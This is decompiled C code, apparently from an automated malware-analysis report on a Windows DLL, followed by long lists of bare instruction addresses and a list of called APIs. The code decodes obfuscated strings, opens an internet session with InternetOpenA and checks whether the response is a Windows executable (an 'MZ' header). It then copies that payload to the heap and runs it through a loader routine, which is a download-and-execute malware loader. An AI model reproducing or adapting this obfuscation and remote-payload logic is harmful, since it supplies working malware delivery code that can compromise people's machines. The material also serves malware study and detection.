				 *((char*)(_t835 - 0x13d)) = 0x78;
				 *((char*)(_t835 - 0x13c)) = 0xc;
				 *((char*)(_t835 - 0x13b)) = 0x3e;
				 *((char*)(_t835 - 0x13a)) = 0x27;
				 *((char*)(_t835 - 0x139)) = 0x75;
				 *((char*)(_t835 - 0x138)) = 0x78;
				 *((char*)(_t835 - 0x137)) = 0xd;
				 *((char*)(_t835 - 0x136)) = 0x26;
				 *((char*)(_t835 - 0x135)) = 0x26;
				 *((char*)(_t835 - 0x134)) = 0x3d;
				 *((char*)(_t835 - 0x133)) = 0x75;
				 *((char*)(_t835 - 0x132)) = 0x3d;
				 *((char*)(_t835 - 0x131)) = 0x75;
				 *((char*)(_t835 - 0x130)) = 0x5b;
				 *((char*)(_t835 - 0x12f)) = 0x2a;
				 *((char*)(_t835 - 0x12e)) = 0x58;
				 *((char*)(_t835 - 0x12d)) = 0x10;
				 *((char*)(_t835 - 0x12c)) = 0x3e;
				 *((char*)(_t835 - 0x12b)) = 0x48;
				 *((char*)(_t835 - 0x12a)) = 0x14;
				 *((char*)(_t835 - 0x129)) = 0;
				if( *((intOrPtr*)(_t835 - 0x129)) == 0) {
					_t831 = 0;
					do {
						_t780 = 0x14;
						_t741 = _t780 - ( *(_t835 + _t831 - 0x150) & 0x000000ff);
						asm("cdq");
						_t661 = _t816 + (_t780 - ( *(_t835 + _t831 - 0x150) & 0x000000ff)) * 0x2c % _t816;
						asm("cdq");
						_t795 = _t661 % _t816;
						 *(_t835 + _t831 - 0x150) = _t661 % _t816;
						_t831 = _t831 + 1;
					} while (_t831 < 0x27);
					 *((char*)(_t835 - 0x129)) = 1;
				}
				_t532 = E6E776599(E6E77111C(), _t823, _t741, _t741, _t835 - 0x150); // executed
				 *0x6e78d60c = _t532;
				if(_t532 != 0 && E6E7752ED(E6E77111C(), _t816) == 0xb7) {
					E6E77516C(E6E77111C(), _t816,  *0x6e78d60c);
					E6E77549F(E6E77111C(), _t816, 1);
				}
				_t533 = E6E77111C();
				 *((char*)(_t835 - 0x160)) = 4;
				 *((char*)(_t835 - 0x15f)) = 0x64;
				_t824 = _t533;
				 *((char*)(_t835 - 0x15e)) = 0x79;
				 *((char*)(_t835 - 0x15d)) = 0x11;
				 *((char*)(_t835 - 0x15c)) = 0x6e;
				 *((char*)(_t835 - 0x15b)) = 7;
				 *((char*)(_t835 - 0x15a)) = 0x6e;
				 *((char*)(_t835 - 0x159)) = 0x51;
				 *((char*)(_t835 - 0x158)) = 0x69;
				 *((char*)(_t835 - 0x157)) = 0x6e;
				 *((char*)(_t835 - 0x156)) = 0x7c;
				 *((char*)(_t835 - 0x155)) = 0x20;
				 *((char*)(_t835 - 0x154)) = 0x2b;
				 *((char*)(_t835 - 0x153)) = 0x55;
				 *((char*)(_t835 - 0x152)) = 0x1f;
				 *((char*)(_t835 - 0x151)) = 0;
				_t535 = E6E775D06(_t835 - 0x160);
				_t279 = _t824 + 0xc; // 0xc
				_t536 = E6E77657F(_t279, _t535);
				_t537 =  *_t536(0, 2); // executed
				if(_t537 < 0) {
					E6E776CD4();
					E6E77549F(E6E77111C(), _t816, 1);
				}
				if( *(_t835 - 0x28) == 2) {
					E6E776741(); // executed
				}
				_t538 = E6E77111C();
				 *((char*)(_t835 - 0x9c)) = 0x18;
				 *((char*)(_t835 - 0x9b)) = 0x62;
				 *((char*)(_t835 - 0x9a)) = 0x6e;
				 *((char*)(_t835 - 0x99)) = 0x50;
				_t285 = _t538 + 4; // 0x4
				_t817 = _t285;
				 *((char*)(_t835 - 0x98)) = 0x6a;
				 *((char*)(_t835 - 0x97)) = 0x62;
				 *((char*)(_t835 - 0x96)) = 0x50;
				 *((char*)(_t835 - 0x95)) = 0x6e;
				 *((char*)(_t835 - 0x94)) = 0x24;
				 *((char*)(_t835 - 0x93)) = 0x66;
				 *((char*)(_t835 - 0x92)) = 0x50;
				 *((char*)(_t835 - 0x91)) = 0x62;
				 *((char*)(_t835 - 0x90)) = 8;
				 *((char*)(_t835 - 0x8f)) = 5;
				 *((char*)(_t835 - 0x8e)) = 0;
				 *(_t835 - 0x70) = _t285;
				if( *((intOrPtr*)(_t835 - 0x8e)) == 0) {
					_t830 = 0;
					_t820 = 0x7f;
					do {
						_t774 = 5;
						asm("cdq");
						_t645 = _t820 + (_t774 - ( *(_t835 + _t830 - 0x9c) & 0x000000ff)) * 0x3f % _t820;
						asm("cdq");
						_t795 = _t645 % _t820;
						 *(_t835 + _t830 - 0x9c) = _t645 % _t820;
						_t830 = _t830 + 1;
					} while (_t830 < 0xe);
					_t817 =  *(_t835 - 0x70);
					 *((char*)(_t835 - 0x8e)) = 1;
				}
				E6E77657F(_t817, _t835 - 0x9c);
				_t542 = InternetOpenA(0, 1, 0, 0, 0); // executed
				_t729 = _t542;
				 *(_t835 - 0x70) = _t729;
				_t868 = _t729;
				if(_t729 == 0) {
					E6E776CD4();
					E6E77549F(E6E77111C(), _t817, 1);
				}
				_t818 = _t835 - 0x54;
				_t746 = 6;
				_t544 = memset(_t818, 0, _t746 << 2);
				_t819 = _t818 + _t746;
				 *(_t835 - 0x54) = _t729;
				 *(_t835 - 0x50) = _t544;
				 *(_t835 - 0x4c) = _t729;
				 *(_t835 - 0x48) = _t544;
				 *(_t835 - 0x44) = _t544;
				 *(_t835 - 0x40) = _t544;
				 *(_t835 - 4) = _t544;
				_t545 = E6E773B7E(_t835 - 0x54, _t795, _t868); // executed
				if(_t545 != 0) {
					 *((char*)(_t835 - 0x7c)) = 0xd;
					_t753 = 0;
					 *((char*)(_t835 - 0x7b)) = 0xa;
					 *((char*)(_t835 - 0x7a)) = 0;
					 *((char*)(_t835 - 0x78)) = 0x54;
					 *((char*)(_t835 - 0x77)) = 0x44;
					 *((char*)(_t835 - 0x76)) = 0x57;
					 *((char*)(_t835 - 0x75)) = 0x76;
					 *((char*)(_t835 - 0x74)) = 0x55;
					 *((char*)(_t835 - 0x73)) = 0;
					_t819 = 0x7f;
					if( *((intOrPtr*)(_t835 - 0x73)) == 0) {
						do {
							_t340 = _t753 - 0x78; // 0x54
							asm("cdq");
							_t636 = _t819 + (( *(_t835 + _t340) & 0x000000ff) - 0x55) * 0x29 % _t819;
							asm("cdq");
							_t795 = _t636 % _t819;
							 *((char*)(_t835 + _t753 - 0x78)) = _t636 % _t819;
							_t753 = _t753 + 1;
						} while (_t753 < 5);
						 *((char*)(_t835 - 0x73)) = 1;
					}
					_t825 = E6E773CCB(_t835 - 0x7c);
					_t557 = E6E77111C();
					_t354 = _t835 - 0x78; // 0x54
					_t756 = _t557;
					E6E7750B1(_t756, _t819, _t354, _t556);
					 *(_t835 - 0xac) = 9;
					 *((char*)(_t835 - 0xab)) = 0x61;
					 *((char*)(_t835 - 0xaa)) = 0x59;
					 *((char*)(_t835 - 0xa9)) = 0x61;
					 *((char*)(_t835 - 0xa8)) = 0x53;
					 *((char*)(_t835 - 0xa7)) = 0x61;
					 *((char*)(_t835 - 0xa6)) = 0x6e;
					 *((char*)(_t835 - 0xa5)) = 0x61;
					 *((char*)(_t835 - 0xa4)) = 0x3e;
					 *((char*)(_t835 - 0xa3)) = 0x61;
					 *((char*)(_t835 - 0xa2)) = 0x1e;
					 *((char*)(_t835 - 0xa1)) = 0x61;
					 *((char*)(_t835 - 0xa0)) = 0x61;
					 *((char*)(_t835 - 0x9f)) = 0x61;
					 *((char*)(_t835 - 0x9e)) = 0;
					if( *((intOrPtr*)(_t835 - 0x9e)) == 0) {
						_t829 = 0;
						do {
							_t772 = 0x61;
							_t756 = _t772 - ( *(_t835 + _t829 - 0xac) & 0x000000ff);
							asm("cdq");
							_t629 = _t819 + _t756 * 0x18 % _t819;
							asm("cdq");
							_t795 = _t629 % _t819;
							 *(_t835 + _t829 - 0xac) = _t629 % _t819;
							_t829 = _t829 + 1;
						} while (_t829 < 0xe);
						 *((char*)(_t835 - 0x9e)) = 1;
					}
					lstrcpyW(_t835 - 0x24, _t835 - 0xac);
					_push(_t756);
					E6E774FF4(E6E77111C(), _t819, _t835 - 0x24);
					asm("xorps xmm0, xmm0");
					_t758 = 0;
					asm("movlpd [ebp-0x30], xmm0");
					 *((char*)(_t835 - 0x8c)) = 0x19;
					 *((char*)(_t835 - 0x8b)) = 0x49;
					 *((char*)(_t835 - 0x8a)) = 0x30;
					 *((char*)(_t835 - 0x89)) = 0x62;
					 *((char*)(_t835 - 0x88)) = 0x65;
					 *((char*)(_t835 - 0x87)) = 0x19;
					 *((char*)(_t835 - 0x86)) = 0x24;
					 *((char*)(_t835 - 0x85)) = 8;
					 *((char*)(_t835 - 0x84)) = 0x11;
					 *((char*)(_t835 - 0x83)) = 0x33;
					 *((char*)(_t835 - 0x82)) = 5;
					 *((char*)(_t835 - 0x81)) = 0x30;
					 *((char*)(_t835 - 0x80)) = 0x5c;
					 *((char*)(_t835 - 0x7f)) = 0;
					if( *((intOrPtr*)(_t835 - 0x7f)) == 0) {
						do {
							asm("cdq");
							_t623 = _t819 + (( *(_t835 + _t758 - 0x8c) & 0x000000ff) - 0x5c) * 0x29 % _t819;
							asm("cdq");
							_t795 = _t623 % _t819;
							 *(_t835 + _t758 - 0x8c) = _t623 % _t819;
							_t758 = _t758 + 1;
						} while (_t758 < 0xd);
						 *((char*)(_t835 - 0x7f)) = 1;
						_t758 = 0;
					}
					 *((char*)(_t835 - 0x6c)) = 0x11;
					 *((char*)(_t835 - 0x6b)) = 0x45;
					 *((char*)(_t835 - 0x6a)) = 0x3c;
					 *((char*)(_t835 - 0x69)) = 0x55;
					 *((char*)(_t835 - 0x68)) = _t758;
					if( *((char*)(_t835 - 0x68)) == 0) {
						_t828 = _t758;
						do {
							_t770 = 0x55;
							asm("cdq");
							_t616 = _t819 + (_t770 - ( *(_t835 + _t828 - 0x6c) & 0x000000ff)) * 0x2c % _t819;
							asm("cdq");
							_t795 = _t616 % _t819;
							 *(_t835 + _t828 - 0x6c) = _t616 % _t819;
							_t828 = _t828 + 1;
						} while (_t828 < 4);
						 *((char*)(_t835 - 0x68)) = 1;
						_t758 = 0;
					}
					_push(1);
					_push(_t758);
					_push(_t758);
					_push(_t758);
					_push(_t758);
					_push(_t835 - 0x6c);
					_push(_t835 - 0x8c);
					_push(_t835 - 0x30);
					_t759 = _t835 - 0x54;
					E6E773C02(_t759, 0); // executed
					 *(_t835 - 4) = 1;
					_t573 =  *((intOrPtr*)(_t835 - 0x30));
					if(_t573 != 0) {
						 *(_t835 - 0x34) =  *(_t835 - 0x34) & 0x00000000;
						_push(_t759);
						 *((intOrPtr*)(_t835 - 0x3c)) = 4;
						_t451 = E6E77111C() + 4; // 0x4
						if(E6E773EFC(_t451, _t819, _t573, 0x20000013, _t835 - 0x34, _t835 - 0x3c) == 0) {
							 *((intOrPtr*)(_t835 - 0x2c)) = E6E7752ED(E6E77111C(), _t819);
						} else {
							if( *(_t835 - 0x34) == 0xc8) {
								 *(_t835 - 0x100) = 0;
								 *((intOrPtr*)(_t835 - 0x164)) = 0;
								E6E773015();
								_t583 = E6E773015();
								_t765 = _t835 - 0x30;
								_t586 = E6E774985(_t765, _t795, _t819, _t825, _t835 - 0x100, _t835 - 0x164,  *((intOrPtr*)(_t583 + 0xc)), 8); // executed
								if(_t586 != 0) {
									_t826 =  *(_t835 - 0x100);
									if( *((intOrPtr*)(_t835 - 0x164)) > 0x40 &&  *_t826 == 0x5a4d) {
										_t819 = HeapAlloc(GetProcessHeap(), 0, 0x12f);
										if(_t819 != 0) {
											_t594 = E6E77111C();
											_push(_t765);
											_t595 = E6E774F2B(_t594, _t819, _t819);
											 *(_t835 - 0xe8) = 0x21;
											_t827 = _t595;
											 *((char*)(_t835 - 0xe7)) = 0x7a;
											 *((char*)(_t835 - 0xe6)) = 0x63;
											 *((char*)(_t835 - 0xe5)) = 0x74;
											 *((char*)(_t835 - 0xe4)) = 0x5c;
											 *((char*)(_t835 - 0xe3)) = 0x47;
											 *((char*)(_t835 - 0xe2)) = 6;
											 *((char*)(_t835 - 0xe1)) = 1;
											 *((char*)(_t835 - 0xe0)) = 0x19;
											 *((char*)(_t835 - 0xdf)) = 0x21;
											 *((char*)(_t835 - 0xde)) = 0x77;
											 *((char*)(_t835 - 0xdd)) = 6;
											 *((char*)(_t835 - 0xdc)) = 0x5f;
											 *((char*)(_t835 - 0xdb)) = 0x79;
											 *((char*)(_t835 - 0xda)) = 0x47;
											 *((char*)(_t835 - 0xd9)) = 0x7b;
											 *((char*)(_t835 - 0xd8)) = 0x47;
											 *((char*)(_t835 - 0xd7)) = 0x52;
											 *((char*)(_t835 - 0xd6)) = 0;
											if( *((intOrPtr*)(_t835 - 0xd6)) == 0) {
												_push(0x7f);
												_t769 = 0;
												do {
													asm("cdq");
													asm("cdq");
													 *(_t835 + _t769 - 0xe8) = (GetProcessHeap + (( *(_t835 + _t769 - 0xe8) & 0x000000ff) - 0x52) * 0x25 % GetProcessHeap) % GetProcessHeap;
													_t769 = _t769 + 1;
												} while (_t769 < 0x12);
												 *((char*)(_t835 - 0xd6)) = 1;
											}
											lstrcpyA(_t827 + _t819, _t835 - 0xe8);
											_push( *((intOrPtr*)(_t835 - 0x164)));
											_t826 =  *(_t835 - 0x100);
											E6E777BC9(_t819, _t826); // executed
											HeapFree(GetProcessHeap(), 0, _t819);
										}
									}
									HeapFree(GetProcessHeap(), 0, _t826);
									_t729 =  *(_t835 - 0x70);
								}
							}
						}
						_t573 =  *((intOrPtr*)(_t835 - 0x30));
					}
					 *(_t835 - 4) = 2;
					if(_t573 != 0) {
						_t504 = E6E77111C() + 4; // 0x4
						E6E778517(_t504, _t819, _t573);
					}
					 *(_t835 - 4) = 0;
				}
				_t506 = E6E77111C() + 4; // 0x4
				E6E778517(_t506, _t819, _t729);
				E6E776CD4();
				E6E77549F(E6E77111C(), _t819, 1);
				 *(_t835 - 4) = 3;
				E6E773BE3(_t835 - 0x54);
				E6E774040(_t835 - 0x4c);
				E6E784386();
				return 0;
			}












































































                                                      0x6e776ceb
                                                      0x6e776ceb
                                                      0x6e776cf5
                                                      0x6e776d03
                                                      0x6e776d0d
                                                      0x6e776d0d
                                                      0x6e776d12
                                                      0x6e776d15
                                                      0x6e776d1a
                                                      0x6e776d21
                                                      0x6e776d23
                                                      0x6e776d2a
                                                      0x6e776d31
                                                      0x6e776d38
                                                      0x6e776d3f
                                                      0x6e776d46
                                                      0x6e776d4d
                                                      0x6e776d54
                                                      0x6e776d5b
                                                      0x6e776d62
                                                      0x6e776d69
                                                      0x6e776d70
                                                      0x6e776d77
                                                      0x6e776d7e
                                                      0x6e776d85
                                                      0x6e776d92
                                                      0x6e776d9a
                                                      0x6e776da1
                                                      0x6e776da3
                                                      0x6e776da5
                                                      0x6e776db5
                                                      0x6e776dbb
                                                      0x6e776dbe
                                                      0x6e776dc5
                                                      0x6e776dc6
                                                      0x6e776dcb
                                                      0x6e776dcb
                                                      0x6e776de2
                                                      0x6e776de4
                                                      0x6e776de7
                                                      0x6e776dec
                                                      0x6e776df3
                                                      0x6e776df5
                                                      0x6e776dfc
                                                      0x6e776e03
                                                      0x6e776e0a
                                                      0x6e776e11
                                                      0x6e776e18
                                                      0x6e776e1f
                                                      0x6e776e26
                                                      0x6e776e2d
                                                      0x6e776e34
                                                      0x6e776e3b
                                                      0x6e776e42
                                                      0x6e776e49
                                                      0x6e776e50
                                                      0x6e776e57
                                                      0x6e776e5e
                                                      0x6e776e65
                                                      0x6e776e6c
                                                      0x6e776e7b
                                                      0x6e776e87
                                                      0x6e776e8b
                                                      0x6e776e8d
                                                      0x6e776e8e
                                                      0x6e776e9a
                                                      0x6e776ea0
                                                      0x6e776ea6
                                                      0x6e776ea9
                                                      0x6e776eb0
                                                      0x6e776eb1
                                                      0x6e776eb6
                                                      0x6e776eb9
                                                      0x6e776eb9
                                                      0x6e776ec7
                                                      0x6e776eca
                                                      0x6e776ed4
                                                      0x6e776ed6
                                                      0x6e776ed9
                                                      0x6e776edb
                                                      0x6e776edd
                                                      0x6e776edf
                                                      0x6e776ee2
                                                      0x6e776ee6
                                                      0x6e776eea
                                                      0x6e776ef0
                                                      0x6e776ef2
                                                      0x6e776ef3
                                                      0x6e776ef3
                                                      0x6e776ef6
                                                      0x6e776ef7
                                                      0x6e776efb
                                                      0x6e776efb
                                                      0x6e776f00
                                                      0x6e776f06
                                                      0x6e776f09
                                                      0x6e776f0d
                                                      0x6e776f11
                                                      0x6e776f15
                                                      0x6e776f1c
                                                      0x6e776f23
                                                      0x6e776f27
                                                      0x6e776f28
                                                      0x6e776f35
                                                      0x6e776f38
                                                      0x6e776f3b
                                                      0x6e776f3c
                                                      0x6e776f3e
                                                      0x6e776f42
                                                      0x6e776f43
                                                      0x6e776f48
                                                      0x6e776f48
                                                      0x6e776f54
                                                      0x6e776f6a
                                                      0x6e776f6c
                                                      0x6e776f71
                                                      0x6e776f7b
                                                      0x6e776f89
                                                      0x6e776f89
                                                      0x6e776f90
                                                      0x6e776f93
                                                      0x6e776f98
                                                      0x6e776f9f
                                                      0x6e776fa1
                                                      0x6e776fa8
                                                      0x6e776faf
                                                      0x6e776fb6
                                                      0x6e776fbd
                                                      0x6e776fc4
                                                      0x6e776fcb
                                                      0x6e776fd2
                                                      0x6e776fd9
                                                      0x6e776fe0
                                                      0x6e776fe7
                                                      0x6e776fee
                                                      0x6e776ff5
                                                      0x6e776ffc
                                                      0x6e777003
                                                      0x6e77700a
                                                      0x6e777019
                                                      0x6e777025
                                                      0x6e777029
                                                      0x6e77702b
                                                      0x6e77702c
                                                      0x6e77703c
                                                      0x6e77703f
                                                      0x6e777042
                                                      0x6e777043
                                                      0x6e777045
                                                      0x6e77704c
                                                      0x6e77704d
                                                      0x6e777052
                                                      0x6e777055
                                                      0x6e777055
                                                      0x6e777065
                                                      0x6e777079
                                                      0x6e777079
                                                      0x6e777081
                                                      0x6e777083
                                                      0x6e777088
                                                      0x6e777091
                                                      0x6e777098
                                                      0x6e77709f
                                                      0x6e7770a6
                                                      0x6e7770ad
                                                      0x6e7770b4
                                                      0x6e7770bb
                                                      0x6e7770c2
                                                      0x6e7770c9
                                                      0x6e7770d0
                                                      0x6e7770d7
                                                      0x6e7770de
                                                      0x6e7770e5
                                                      0x6e7770ec
                                                      0x6e7770f3
                                                      0x6e7770fa
                                                      0x6e777101
                                                      0x6e777108
                                                      0x6e77710f
                                                      0x6e777116
                                                      0x6e77711d
                                                      0x6e777124
                                                      0x6e77712b
                                                      0x6e777132
                                                      0x6e777139
                                                      0x6e777140
                                                      0x6e777147
                                                      0x6e77714e
                                                      0x6e777155
                                                      0x6e77715c
                                                      0x6e777163
                                                      0x6e77716a
                                                      0x6e777171
                                                      0x6e777178
                                                      0x6e77717f
                                                      0x6e777186
                                                      0x6e77718d
                                                      0x6e777194
                                                      0x6e7771a1
                                                      0x6e7771a9
                                                      0x6e7771b0
                                                      0x6e7771b2
                                                      0x6e7771b4
                                                      0x6e7771c0
                                                      0x6e7771c1
                                                      0x6e7771c6
                                                      0x6e7771c9
                                                      0x6e7771cc
                                                      0x6e7771cd
                                                      0x6e7771cf
                                                      0x6e7771d6
                                                      0x6e7771d7
                                                      0x6e7771dc
                                                      0x6e7771dc
                                                      0x6e7771f1
                                                      0x6e7771f3
                                                      0x6e7771f8
                                                      0x6e7771fc
                                                      0x6e77720f
                                                      0x6e777219
                                                      0x6e777227
                                                      0x6e777227
                                                      0x6e777232
                                                      0x6e777234
                                                      0x6e777234
                                                      0x6e777239
                                                      0x6e777240
                                                      0x6e777247
                                                      0x6e77724e
                                                      0x6e777255
                                                      0x6e77725c
                                                      0x6e777263
                                                      0x6e77726a
                                                      0x6e777271
                                                      0x6e777278
                                                      0x6e77727f
                                                      0x6e777286
                                                      0x6e77728d
                                                      0x6e777294
                                                      0x6e77729b
                                                      0x6e7772a2
                                                      0x6e7772a9
                                                      0x6e7772b0
                                                      0x6e7772b7
                                                      0x6e7772be
                                                      0x6e7772c5
                                                      0x6e7772cc
                                                      0x6e7772d3
                                                      0x6e7772da
                                                      0x6e7772e1
                                                      0x6e7772e8
                                                      0x6e7772ef
                                                      0x6e7772f6
                                                      0x6e7772fd
                                                      0x6e777304
                                                      0x6e77730b
                                                      0x6e777312
                                                      0x6e777319
                                                      0x6e777320
                                                      0x6e777327
                                                      0x6e77732e
                                                      0x6e777335
                                                      0x6e77733c
                                                      0x6e777343
                                                      0x6e777350
                                                      0x6e77735c
                                                      0x6e77735e
                                                      0x6e777360
                                                      0x6e77736c
                                                      0x6e77736d
                                                      0x6e777372
                                                      0x6e777375
                                                      0x6e777378
                                                      0x6e777379
                                                      0x6e77737b
                                                      0x6e777382
                                                      0x6e777383
                                                      0x6e777388
                                                      0x6e777388
                                                      0x6e77739f
                                                      0x6e7773a4
                                                      0x6e7773ab
                                                      0x6e7773cd
                                                      0x6e7773db
                                                      0x6e7773db
                                                      0x6e7773e0
                                                      0x6e7773e5
                                                      0x6e7773f2
                                                      0x6e7773f9
                                                      0x6e7773fb
                                                      0x6e777402
                                                      0x6e777409
                                                      0x6e777410
                                                      0x6e777417
                                                      0x6e77741e
                                                      0x6e777425
                                                      0x6e77742c
                                                      0x6e777433
                                                      0x6e77743a
                                                      0x6e777441
                                                      0x6e777448
                                                      0x6e77744f
                                                      0x6e77745c
                                                      0x6e777462
                                                      0x6e777468
                                                      0x6e77746b
                                                      0x6e777473
                                                      0x6e777477
                                                      0x6e777479
                                                      0x6e777487
                                                      0x6e777487
                                                      0x6e777490
                                                      0x6e777492
                                                      0x6e777492
                                                      0x6e777497
                                                      0x6e77749c
                                                      0x6e7774a3
                                                      0x6e7774aa
                                                      0x6e7774b1
                                                      0x6e7774b8
                                                      0x6e7774b8
                                                      0x6e7774bb
                                                      0x6e7774c2
                                                      0x6e7774c9
                                                      0x6e7774d0
                                                      0x6e7774d7
                                                      0x6e7774de
                                                      0x6e7774e5
                                                      0x6e7774ec
                                                      0x6e7774f3
                                                      0x6e7774fa
                                                      0x6e777507
                                                      0x6e77750d
                                                      0x6e777516
                                                      0x6e77751a
                                                      0x6e77751c
                                                      0x6e77751d
                                                      0x6e777529
                                                      0x6e77752f
                                                      0x6e777532
                                                      0x6e777535
                                                      0x6e777536
                                                      0x6e777538
                                                      0x6e77753f
                                                      0x6e777540
                                                      0x6e777545
                                                      0x6e777548
                                                      0x6e777548
                                                      0x6e777558
                                                      0x6e777563
                                                      0x6e777565
                                                      0x6e777567
                                                      0x6e77756a
                                                      0x6e77756c
                                                      0x6e77756e
                                                      0x6e77757c
                                                      0x6e77757c
                                                      0x6e777583
                                                      0x6e777588
                                                      0x6e777589
                                                      0x6e777589
                                                      0x6e77758b
                                                      0x6e77758e
                                                      0x6e777591
                                                      0x6e777594
                                                      0x6e777597
                                                      0x6e77759a
                                                      0x6e7775a0
                                                      0x6e7775a3
                                                      0x6e7775aa
                                                      0x6e7775b0
                                                      0x6e7775b4
                                                      0x6e7775b6
                                                      0x6e7775bd
                                                      0x6e7775c0
                                                      0x6e7775c4
                                                      0x6e7775c8
                                                      0x6e7775cc
                                                      0x6e7775d0
                                                      0x6e7775d7
                                                      0x6e7775dc
                                                      0x6e7775e0
                                                      0x6e7775e2
                                                      0x6e7775e2
                                                      0x6e7775ef
                                                      0x6e7775f2
                                                      0x6e7775f5
                                                      0x6e7775f6
                                                      0x6e7775f8
                                                      0x6e7775fc
                                                      0x6e7775fd
                                                      0x6e777602
                                                      0x6e777602
                                                      0x6e77760e
                                                      0x6e777610
                                                      0x6e777616
                                                      0x6e77761a
                                                      0x6e77761c
                                                      0x6e777621
                                                      0x6e777628
                                                      0x6e77762f
                                                      0x6e777636
                                                      0x6e77763d
                                                      0x6e777644
                                                      0x6e77764b
                                                      0x6e777652
                                                      0x6e777659
                                                      0x6e777660
                                                      0x6e777667
                                                      0x6e77766e
                                                      0x6e777675
                                                      0x6e77767c
                                                      0x6e77768b
                                                      0x6e777697
                                                      0x6e777699
                                                      0x6e77769b
                                                      0x6e7776a7
                                                      0x6e7776a8
                                                      0x6e7776ad
                                                      0x6e7776b0
                                                      0x6e7776b3
                                                      0x6e7776b4
                                                      0x6e7776b6
                                                      0x6e7776bd
                                                      0x6e7776be
                                                      0x6e7776c3
                                                      0x6e7776c3
                                                      0x6e7776d5
                                                      0x6e7776db
                                                      0x6e7776e7
                                                      0x6e7776ec
                                                      0x6e7776ef
                                                      0x6e7776f1
                                                      0x6e7776f6
                                                      0x6e7776fd
                                                      0x6e777704
                                                      0x6e77770b
                                                      0x6e777712
                                                      0x6e777719
                                                      0x6e777720
                                                      0x6e777727
                                                      0x6e77772e
                                                      0x6e777735
                                                      0x6e77773c
                                                      0x6e777743
                                                      0x6e77774a
                                                      0x6e777754
                                                      0x6e77775a
                                                      0x6e77775c
                                                      0x6e77776c
                                                      0x6e77776f
                                                      0x6e777772
                                                      0x6e777773
                                                      0x6e777775
                                                      0x6e77777c
                                                      0x6e77777d
                                                      0x6e777782
                                                      0x6e777786
                                                      0x6e777786
                                                      0x6e777788
                                                      0x6e77778c
                                                      0x6e777790
                                                      0x6e777794
                                                      0x6e77779b
                                                      0x6e7777a2
                                                      0x6e7777a4
                                                      0x6e7777a6
                                                      0x6e7777af
                                                      0x6e7777b5
                                                      0x6e7777b8
                                                      0x6e7777bb
                                                      0x6e7777bc
                                                      0x6e7777be
                                                      0x6e7777c2
                                                      0x6e7777c3
                                                      0x6e7777c8
                                                      0x6e7777cc
                                                      0x6e7777cc
                                                      0x6e7777ce
                                                      0x6e7777d0
                                                      0x6e7777d1
                                                      0x6e7777d2
                                                      0x6e7777d3
                                                      0x6e7777d7
                                                      0x6e7777de
                                                      0x6e7777e2
                                                      0x6e7777e3
                                                      0x6e7777e6
                                                      0x6e7777eb
                                                      0x6e7777ef
                                                      0x6e7777f4
                                                      0x6e7777fa
                                                      0x6e7777fe
                                                      0x6e777802
                                                      0x6e777819
                                                      0x6e777823
                                                      0x6e7779e1
                                                      0x6e777829
                                                      0x6e777830
                                                      0x6e777838
                                                      0x6e77783e
                                                      0x6e777844
                                                      0x6e77784b
                                                      0x6e777850
                                                      0x6e777864
                                                      0x6e77786b
                                                      0x6e77787e
                                                      0x6e777884
                                                      0x6e7778a9
                                                      0x6e7778ad
                                                      0x6e7778b3
                                                      0x6e7778b8
                                                      0x6e7778bc
                                                      0x6e7778c1
                                                      0x6e7778c8
                                                      0x6e7778ca
                                                      0x6e7778d1
                                                      0x6e7778d8
                                                      0x6e7778df
                                                      0x6e7778e6
                                                      0x6e7778ed
                                                      0x6e7778f4
                                                      0x6e7778fb
                                                      0x6e777902
                                                      0x6e777909
                                                      0x6e777910
                                                      0x6e777917
                                                      0x6e77791e
                                                      0x6e777925
                                                      0x6e77792c
                                                      0x6e777933
                                                      0x6e77793a
                                                      0x6e777949
                                                      0x6e777955
                                                      0x6e777957
                                                      0x6e777959
                                                      0x6e77795c
                                                      0x6e77796c
                                                      0x6e777972
                                                      0x6e777975
                                                      0x6e77797c
                                                      0x6e77797d
                                                      0x6e777988
                                                      0x6e777988
                                                      0x6e77799a
                                                      0x6e7779a0
                                                      0x6e7779a6
                                                      0x6e7779b0
                                                      0x6e7779bd
                                                      0x6e7779bd
                                                      0x6e7778ad
                                                      0x6e7779ca
                                                      0x6e7779d0
                                                      0x6e7779d0
                                                      0x6e77786b
                                                      0x6e777830
                                                      0x6e7779e4
                                                      0x6e7779e4
                                                      0x6e7779e7
                                                      0x6e7779ed
                                                      0x6e7779f5
                                                      0x6e7779f8
                                                      0x6e7779f8
                                                      0x6e7779ff
                                                      0x6e7779ff
                                                      0x6e777a08
                                                      0x6e777a0b
                                                      0x6e777a10
                                                      0x6e777a1e
                                                      0x6e777a26
                                                      0x6e777a2d
                                                      0x6e777a35
                                                      0x6e777a3c
                                                      0x6e777a41

                                                      APIs
                                                      • __EH_prolog3_GS.LIBCMT ref: 6E776CF5
                                                        • Part of subcall function 6E7766B9: GetProcessHeap.KERNEL32(00000000,00000000), ref: 6E7766EF
                                                        • Part of subcall function 6E7766B9: HeapAlloc.KERNEL32(00000000), ref: 6E7766F6
                                                        • Part of subcall function 6E7766B9: GetProcessHeap.KERNEL32(00000000,00000000), ref: 6E77672E
                                                        • Part of subcall function 6E7766B9: HeapFree.KERNEL32(00000000), ref: 6E776735
                                                        • Part of subcall function 6E77111C: __EH_prolog3.LIBCMT ref: 6E771123
                                                      • lstrcpyW.KERNEL32(?,00000007), ref: 6E776F54
                                                      • CoInitializeEx.OLE32(00000000,00000002,00000000), ref: 6E777473
                                                      • InternetOpenA.WININET(00000000,00000001,00000000,00000000,00000000,00000018), ref: 6E777563
                                                      • lstrcpyW.KERNEL32(?,00000009), ref: 6E7776D5
                                                        • Part of subcall function 6E773015: __EH_prolog3.LIBCMT ref: 6E77301C
                                                      • GetProcessHeap.KERNEL32(00000000,0000012F,?,20000013,00000000,?,?,?,00000019,00000011,00000000,00000000,00000000,00000000,00000001), ref: 6E7778A0
                                                      • HeapAlloc.KERNEL32(00000000,?,?,00000019,00000011,00000000,00000000,00000000,00000000,00000001), ref: 6E7778A3
                                                      • lstrcpyA.KERNEL32(00000021,00000021,?,?,00000019,00000011,00000000,00000000,00000000,00000000,00000001), ref: 6E77799A
                                                      • GetProcessHeap.KERNEL32(00000000,00000000,?,?,00000019,00000011,00000000,00000000,00000000,00000000,00000001), ref: 6E7779BA
                                                      • HeapFree.KERNEL32(00000000,?,?), ref: 6E7779BD
                                                      • GetProcessHeap.KERNEL32(00000000,?,?,20000013,00000000,?,?,?,00000019,00000011,00000000,00000000,00000000,00000000,00000001), ref: 6E7779C7
                                                      • HeapFree.KERNEL32(00000000,?,?), ref: 6E7779CA
                                                      Strings
                                                      Memory Dump Source
